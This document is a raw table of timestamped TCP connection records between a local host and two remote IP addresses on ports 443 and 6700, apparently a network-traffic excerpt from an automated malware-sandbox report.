Sep 14, 2021 17:02:53.984343052 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:54.008013964 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.014518976 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:54.074912071 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.074924946 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.083827019 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:54.094682932 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.095248938 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.103157043 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:54.131366014 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.131421089 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.147346020 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:54.183623075 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.183640957 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.197798967 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:54.207457066 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.207477093 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.207628965 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:54.207648993 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.233583927 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.233602047 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.249147892 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:54.249176979 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.249259949 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:54.289148092 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.289161921 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.289237022 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.289248943 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:54.289311886 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:54.318913937 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.318928003 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.318983078 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.319035053 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:54.319092989 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:54.376149893 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.376163006 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.376241922 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:54.376279116 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:54.405354977 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.405481100 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.405503988 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:54.405603886 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:54.431045055 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.431061029 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.431153059 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:54.480032921 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.480160952 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:54.480446100 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.480535030 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:54.480544090 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:54.480782032 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:03:23.731492996 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:23.920831919 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:23.921158075 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:24.192533016 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:24.395354033 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:24.414350033 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:24.603986025 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:24.659240961 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:24.672687054 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:24.922655106 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:24.922931910 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.171902895 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.172065973 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.172102928 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.172131062 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.172219038 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.172250032 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.361527920 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.361569881 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.361588955 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.361607075 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.361753941 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.361778021 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.362226009 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.362262964 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.362302065 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.362375975 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.362380028 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.362886906 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.551151991 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.551184893 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.551207066 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.551245928 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.551265955 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.551281929 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.551305056 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.551361084 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.551436901 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.551562071 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.551563978 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.551582098 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.551645994 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.551651001 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.551675081 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.551729918 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.551754951 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.551793098 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.551845074 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.551876068 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.552270889 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.552445889 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.552468061 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.552725077 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.628006935 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.740741968 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.740807056 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.740830898 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.740860939 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.740866899 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.740897894 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.740902901 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.740931988 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.740999937 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.741180897 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.741204977 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.741319895 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.741326094 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.741341114 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.741558075 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.741585016 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.741606951 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.741615057 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.741651058 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.741756916 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.741785049 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.741847992 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.741908073 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.742002010 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.742161989 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.742290974 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.742330074 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.742355108 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.742461920 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.742470980 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.742491007 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.742542028 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.742580891 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.742635012 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.742675066 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.742851019 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.742892027 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.742958069 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.743002892 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.743119001 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.743171930 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.743194103 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.743304968 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.743335009 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.743465900 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.743525982 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.743643045 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.743690968 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.743706942 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.743803978 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.743827105 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.743923903 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.743983984 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.744240999 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.744272947 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.744311094 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.744324923 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.744340897 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.744349003 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.875891924 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.931926966 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.931963921 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.932014942 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.932040930 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.932077885 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.932123899 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.932228088 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.932817936 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.932884932 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.932979107 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.932992935 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.933113098 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.933120966 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.933137894 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.933221102 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.933273077 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.933300018 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.933370113 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.933448076 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.934159994 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.934309006 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.934313059 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.934421062 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.935091019 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.935204983 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.935231924 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.935254097 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.935328960 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.935349941 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.935369015 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.935395956 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.935573101 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.935905933 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.935937881 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.935961962 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.936058044 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.936091900 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.936116934 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.936141014 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.936162949 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.936187983 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.936188936 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.936229944 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.936233997 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.936238050 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.936400890 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.936436892 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.936446905 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.936471939 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.936511040 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.936589956 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.936652899 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.936718941 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.936762094 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.936918020 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.936935902 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.936991930 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.937021017 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.937043905 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.937478065 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.937535048 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.937546968 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.937575102 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.937617064 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.937638998 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.937675953 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.937711000 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.937805891 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.937827110 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.937849998 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.937856913 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.937865973 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.937876940 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.937880039 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.937983036 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.938010931 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.938038111 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.938122034 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.938213110 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.938303947 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.938345909 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.938458920 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.938481092 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.938504934 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.938664913 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:25.938689947 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.938704014 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:25.941983938 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.121586084 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.121665001 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.122231007 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.122940063 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.312366962 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.312402964 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.312549114 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.312630892 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.312654018 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.312693119 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.312731028 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.312760115 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.312921047 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.313080072 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.313107967 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.313131094 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.313261032 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.313292980 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.313327074 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.313433886 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.313458920 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.313519001 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.313612938 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.313642025 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.313666105 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.313714027 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.313824892 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.313832998 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.313836098 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.313849926 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.313878059 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.313901901 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.313963890 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.313980103 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.314007044 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.314028978 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.314052105 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.314095020 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.314202070 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.314213037 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.314254999 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.362147093 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.503695011 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.503730059 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.503751993 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.503770113 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.503798962 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.503815889 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.503844976 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.504242897 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.504270077 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.504317045 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.504385948 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.504447937 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.504493952 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.504539967 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.504630089 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.504668951 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.504770041 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.504797935 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.504842043 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.504949093 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.505105972 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.505134106 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.505186081 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.505234003 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.505273104 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.505300045 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.505321026 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.505458117 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.505480051 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.505505085 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.505526066 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.505584955 CEST	6700	49776	194.147.140.20	192.168.2.5
